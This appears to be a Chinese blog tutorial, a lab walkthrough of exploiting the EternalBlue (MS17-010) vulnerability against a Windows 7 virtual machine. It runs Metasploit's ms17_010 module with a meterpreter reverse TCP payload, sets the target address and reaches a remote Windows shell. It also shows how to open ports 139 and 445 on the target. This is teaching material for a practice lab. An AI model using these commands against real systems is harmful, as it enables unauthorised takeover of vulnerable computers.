工具:
Kali-Linux虚拟机
win7靶机 因为在后续的版本都已经进行了补丁修复,win7以上不受攻击。
所需重要靶机端口:
445:可以在局域网中轻松访问各种共享文件夹或共享打印机。
139:139端口是一种TCP端口,该端口在你通过网上邻居访问局域网中的共享文件或共享打印机时就能发挥作用。
信息收集
在root终端输入netdiscover,使用netdiscover对所连接的局域网进行扫描。
![](https://img-blog.csdnimg.cn/img_convert/a5fe73ee4bc0cd5d37217593970a1079.png)
![](https://img-blog.csdnimg.cn/img_convert/4735cabde8ba6daf5461f2a6574a3125.png)
找到局域网中运行的win7虚拟机的IP地址192.168.42.131。
扫描靶机139、445端口,检查是否开放,如果没有开放,参考最后Win7端口设置,进行开放。
![](https://img-blog.csdnimg.cn/img_convert/feea0ee5b9f4c14cbf4cb9eed9ff7370.png)
图中open表示开放,我们可以进行后续操作。
Metasploit漏洞利用
使用Metasploit开始渗透,在shell内输入msfconsole,回车;
![](https://img-blog.csdnimg.cn/img_convert/bf268e198341df8bf199f118be27a5e7.png)
字符图随机,我们即将开始渗透。
ms17_010(永恒之蓝)
永恒之蓝漏洞通过445和139端口可以实现对目标系统所有命令行的控制。
17表示2017年
继续我们的渗透实验,寻找永恒之蓝服务
search ms17_010
![](https://img-blog.csdnimg.cn/img_convert/fc914be6ca27bd0c69a2345eebf49132.png)
我们使用0来进行渗透,后面属于扫描。
![](https://img-blog.csdnimg.cn/img_convert/7bb1b3237d81327d369b61d32e5d5f33.png)
提醒我们没有设置payload,默认使用 windows/x64/meterpreter/reverse_tcp
我们设置payload为后面这段。
set payload windows/x64/meterpreter/reverse_tcp
![](https://img-blog.csdnimg.cn/img_convert/3d99a367d8ff43a7baad99258f52d150.png)
然后输入show options查看相关配置:
![](https://img-blog.csdnimg.cn/img_convert/79a360e352c820c4a1e0fada0e60f217.png)
在RHOSTS后面是没有值的,是我们目标靶机的IP地址,等下我们进行设置,我们使用的是445端口即RPORT,LHOST是我们自身主机的IP地址,开放4444端口进行监听。下面根据自己实验主机,进行目标IP设置。
set RHOSTS 192.168.42.131
最后输入run,使其开始连接,进行渗透。
![](https://img-blog.csdnimg.cn/img_convert/a2850a4970e85b3583c998412b00336b.png)
运行成功后,命令行会有meterpreter>出现,我们输入shell,就可以切换到目标主机的Windows shell,从目标主机的Windows转向meterpreter,只需要输入exit。
![](https://img-blog.csdnimg.cn/img_convert/ddf30e2ab235f34444b7465095d9d72f.png)
出现乱码不要慌,输入
chcp 65001
![](https://img-blog.csdnimg.cn/img_convert/84f6ce52aac4f236b36eb58405568819.png)
由于我们从linux转入Windows,所以需要转码为“UTF-8”。
![](https://img-blog.csdnimg.cn/img_convert/e7d3a8f67401ff613f4b43adbbdd8bc5.png)
输入?即可查看meterpreter的帮助菜单,实现其他功能。
![](https://img-blog.csdnimg.cn/img_convert/9805c9c5cdbfd03a846010b4224fb62f.png)
![](https://img-blog.csdnimg.cn/img_convert/316c295eb6d356cb6292c49306712b16.png)
![](https://img-blog.csdnimg.cn/img_convert/bf95ec7805355ddef6976036ab9c2a4d.png)
![](https://img-blog.csdnimg.cn/img_convert/07d372b4882b581538bfb467f79e740a.png)
好了,已经成功渗透到内网主机,并显示了主机的系统信息,一次简单有意义的入门内网渗透实验到此结束,大家继续加油!!!
![](https://img-blog.csdnimg.cn/img_convert/d9d55507f3071db15c96942bdb6b7803.png)
Win7端口设置
开放端口
从控制面板中找到Windows防火墙,后点击左侧高级设置。
![](https://img-blog.csdnimg.cn/img_convert/ac26e6ce4f0a9a9285eba94262a95c3e.png)
![](https://img-blog.csdnimg.cn/img_convert/8b6183472742b4e43d06af4ebd72dd3e.png)
后在入站规则处右键,选择新建规则,
![](https://img-blog.csdnimg.cn/img_convert/502d4fbdee26dc7343062be8e5ca0406.png)
![](https://img-blog.csdnimg.cn/img_convert/20b87f3cfb8803547fd121a1b14eb8ad.png)
选择端口,下一步。
![](https://img-blog.csdnimg.cn/img_convert/6569af56d09f2abf851342912fc4aea4.png)
输入需要开放的端口。
![](https://img-blog.csdnimg.cn/img_convert/c8f76d94a0e24004e365b3048726524f.png)
![](https://img-blog.csdnimg.cn/img_convert/8426271cc211aa1f651bb4f178c9408b.png)
允许连接,其他默认,那么 我们的Win7靶机的端口环境设置完成。